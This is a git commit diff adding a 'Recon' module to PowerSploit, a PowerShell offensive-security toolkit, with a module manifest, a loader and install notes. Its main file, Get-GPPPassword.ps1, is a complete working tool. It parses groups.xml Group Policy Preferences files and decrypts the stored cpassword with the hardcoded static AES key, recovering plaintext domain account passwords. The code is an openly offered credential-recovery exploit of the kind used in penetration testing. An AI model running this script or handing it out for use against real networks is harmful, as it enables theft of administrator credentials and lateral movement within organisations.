Added 'Recon' Module

2013-01-20 21:32:27 -05:00 · 2013-01-20 21:32:27 -05:00 · b53b6a03a5
parent 065a3b63a4
commit b53b6a03a5
4 changed files with 199 additions and 0 deletions
--- a/Recon/Get-GPPPassword.ps1
+++ b/Recon/Get-GPPPassword.ps1
@ -0,0 +1,98 @@
 function Get-GPPPassword {
 <#
 .Synopsis
 Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml.
 Author: Chris Campbell (@obscuresec)
 License: BSD 3-Clause
 .Description
 Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password.
 .Parameter Path
 The path to the targeted groups.xml file.
 .Example
 Get-GPPPassword -path c:\demo\groups.xml
 .Link
 http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
 http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
 #>
 Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Path = "$PWD\groups.xml" )
    #Function to pull encrypted password string from groups.xml
    function Parse-cPassword {
        try {
            [xml] $Xml = Get-Content ($Path)
            [String] $Cpassword = $Xml.Groups.User.Properties.cpassword
        } catch { Write-Error "No Password Policy Found in File!" } 
        return $Cpassword
    }
    #Function to look to see if the administrator account is given a newname
    function Parse-NewName {
        [xml] $Xml = Get-Content ($Path) 
        [String] $NewName = $Xml.Groups.User.Properties.newName
        return $NewName
    }
    #Function to parse out the Username whose password is being specified
    function Parse-UserName {
        try {
            [xml] $Xml = Get-Content ($Path) 
            [string] $UserName = $Xml.Groups.User.Properties.userName 
        } catch { Write-Error "No Username Specified in File!" }
        return $UserName
    }
    #Function that decodes and decrypts password
    function Decrypt-Password {
        try {
            #Append appropriate padding based on string length  
            $Pad = "=" * (4 - ($Cpassword.length % 4))
            $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad)
            #Create a new AES .NET Crypto Object
            $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
            #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
            [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                                 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
            #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value
            $AesIV = New-Object Byte[]($AesObject.IV.Length) 
            $AesObject.IV = $AesIV
            $AesObject.Key = $AesKey
            $DecryptorObject = $AesObject.CreateDecryptor() 
            [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
            return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
        } catch { Write-Error "Decryption Failed!" }
    }
    $Cpassword = Parse-cPassword 
    $Password = Decrypt-Password
    $NewName = Parse-NewName
    $UserName = Parse-UserName
    $Results = New-Object System.Object
    Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName
    Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName
    Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password
    return $Results
 }
--- a/Recon/Recon.psd1
+++ b/Recon/Recon.psd1
@ -0,0 +1,88 @@
@{
 # Script module or binary module file associated with this manifest.
 ModuleToProcess = 'Recon.psm1'
 # Version number of this module.
 ModuleVersion = '1.0.0.0'
 # ID used to uniquely identify this module
 GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'
 # Author of this module
 Author = 'Matthew Graeber'
 # Company or vendor of this module
 CompanyName = ''
 # Copyright statement for this module
 Copyright = 'BSD 3-Clause'
 # Description of the functionality provided by this module
 Description = 'PowerSploit Reconnaissance Module'
 # Minimum version of the Windows PowerShell engine required by this module
 PowerShellVersion = '2.0'
 # Name of the Windows PowerShell host required by this module
 # PowerShellHostName = ''
 # Minimum version of the Windows PowerShell host required by this module
 # PowerShellHostVersion = ''
 # Minimum version of the .NET Framework required by this module
 # DotNetFrameworkVersion = ''
 # Minimum version of the common language runtime (CLR) required by this module
 # CLRVersion = ''
 # Processor architecture (None, X86, Amd64) required by this module
 # ProcessorArchitecture = ''
 # Modules that must be imported into the global environment prior to importing this module
 # RequiredModules = @()
 # Assemblies that must be loaded prior to importing this module
 # RequiredAssemblies = @()
 # Script files (.ps1) that are run in the caller's environment prior to importing this module.
 # ScriptsToProcess = ''
 # Type files (.ps1xml) to be loaded when importing this module
 # TypesToProcess = @()
 # Format files (.ps1xml) to be loaded when importing this module
 # FormatsToProcess = @()
 # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
 # NestedModules = @()
 # Functions to export from this module
 FunctionsToExport = '*'
 # Cmdlets to export from this module
 CmdletsToExport = '*'
 # Variables to export from this module
 VariablesToExport = ''
 # Aliases to export from this module
 AliasesToExport = ''
 # List of all modules packaged with this module.
 ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'})
 # List of all files packaged with this module
 FileList = 'Recon.psm1', 'Recon.psd1', 'Get-GPPPassword.ps1', 'Get-HttpStatus.ps1',
               'Invoke-ReverseDnsLookup.ps1', 'Usage.md'
 # Private data to pass to the module specified in RootModule/ModuleToProcess
 # PrivateData = ''
 # HelpInfo URI of this module
 # HelpInfoURI = ''
 # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
 # DefaultCommandPrefix = ''
 }
--- a/Recon/Recon.psm1
+++ b/Recon/Recon.psm1
@ -0,0 +1 @@
 Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
--- a/Recon/Usage.md
+++ b/Recon/Usage.md
@ -0,0 +1,12 @@
 To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
 To use the module, type `Import-Module Recon`
 To see the commands imported, type `Get-Command -Module Recon`
 For help on each individual command, Get-Help is your friend.
 Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
		`@ -0,0 +1 @@`
							`Get-ChildItem (Join-Path $PSScriptRoot *.ps1) \| % { . $_.FullName}`